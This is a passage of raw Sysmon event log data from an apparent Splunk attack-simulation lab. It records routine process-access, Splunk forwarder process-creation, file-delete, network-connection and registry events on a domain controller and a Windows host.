Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.327{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.327{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.327{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.327{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.327{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1826-6216-3F07-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.327{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1826-6216-3F07-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.329{C8EA50B7-1826-6216-3F07-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.716{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1827-6216-4007-000000003802}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.716{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.716{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.716{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.716{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.716{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1827-6216-4007-000000003802}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.716{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1827-6216-4007-000000003802}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.717{C8EA50B7-1827-6216-4007-000000003802}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.678{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=385753A55C0A925B2AFDB5B4C3DAD036,SHA256=E2081C4E3C0CA4F82A8A0013307972D23CC25935175F87800BE441DB64C753BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:03.602{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31C094A91D9DF1A7246D95DBF54B05CA,SHA256=7C162F0C3F3EBBBD902427D2ED050BDE8F724710D1882FBDC0BBB1923D8DEEEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:04.700{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59CC1CE105538E30B393CE21715EC324,SHA256=59FDFC5872B298F520B6D392A30C8D39474CC32B034EB93DFBD5EC90EA4C119E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:04.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABB6E9BD1F417D6E368CDCAB175D2F96,SHA256=FDE268D67BEF6B34CC7B88E94CA53DB8A231C9D470AAFEEB53EF024BC06D6BB0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.551{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49493-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000297913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.490{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49492-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:03.490{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49492-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000297911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:05.715{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15CEBDB7E2FD1C427A2928656C81166F,SHA256=2BDA269836AEE4EF6F1562995F910A01044E6CEC9E214B8BF59500E8CC20D19D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:05.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E440669884A7EAE482661681107C58D9,SHA256=363CEFCCD49680B17BDA76FE4B85F63C3FFFCAB338FE985311DD996CD089E1B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:06.696{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=887B6BCF788ECC60EDFF3C3CEDA72C48,SHA256=5221FBDCBC246D4BD07C972C7C415D552E69B045A7B0F927A581D89E3B8110B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:06.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF76E63C876DE55A26984992FE933D5C,SHA256=D2929EB30E1A70CD4C5E77FF1D73B9AC76395E5CEC5664A5B9F0B69BD5E87F00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:07.930{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18233EDED0DE7A32114A5D1878A5D536,SHA256=10EE65FC511C71F41DB90A6F558CB44AE9395E4D2E4DC6237257ED6231FAE26E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000297917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:07.792{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a7-0x2c74b1f8) 23542300x8000000000000000297916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:07.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65DC5A90197CA818B6CB6EE8CA9BDF3D,SHA256=277C51F787FD20DFC6BE5FC4CE518007CB034F5D7E683737BA2566E7EF3117A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:04.711{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51674-false10.0.1.12-8000- 23542300x8000000000000000297918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:08.763{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C30BB2079F45EDDB354CABEAF282024,SHA256=7DE8958CD15727768D9408CF9BD308D7D594937F606D803CDE3463604D2D52DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:09.779{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEB147AAEC3CA8FEF230EE87834F44BC,SHA256=CE79F583FA8CD587B84D42601F688F3DAD5BB49E2A07A4DD86EE1C884061359D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:09.102{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95C784F93FF112784C3535E59432537,SHA256=CBC21055CB3AE2897BF29618C4BD2E256364A70F62C503F3A4E496F265C7A29E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:08.622{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49494-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:10.798{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BADDD62DF1FB4217E9DB8A830CF789D6,SHA256=909AAEEB492D8A0421FF265F13B44581817467AB2E5F99B91DA85034E56A7C3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:10.337{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D599CFEB3DA38BBA894F62F3CAED814,SHA256=ABFC33C934209068DE72EFE4FA7871630F8A0282D6F760790411D3634F436CE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:11.815{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08D4C045DDBB6F07E6416CD1C367204F,SHA256=A7A9958F8364ECD881B1C3A400363F726F436872B89DAC2153C82C126CD1A87C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:11.524{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 